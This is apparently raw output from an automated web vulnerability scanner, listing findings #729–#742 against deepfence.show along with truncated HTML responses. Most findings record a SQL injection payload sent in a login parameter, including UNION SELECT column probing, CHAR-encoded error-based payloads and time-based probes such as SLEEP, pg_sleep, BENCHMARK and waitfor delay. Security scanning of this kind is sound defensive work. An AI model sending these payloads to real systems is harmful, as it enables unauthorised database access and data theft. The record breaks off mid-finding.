tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #729\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #730\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io``\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #731\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #732\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #733\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #734\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \" or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #735\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #736\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #737\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #738\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #739\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #740\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #741\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io waitfor delay '00:00:05'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #742\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ 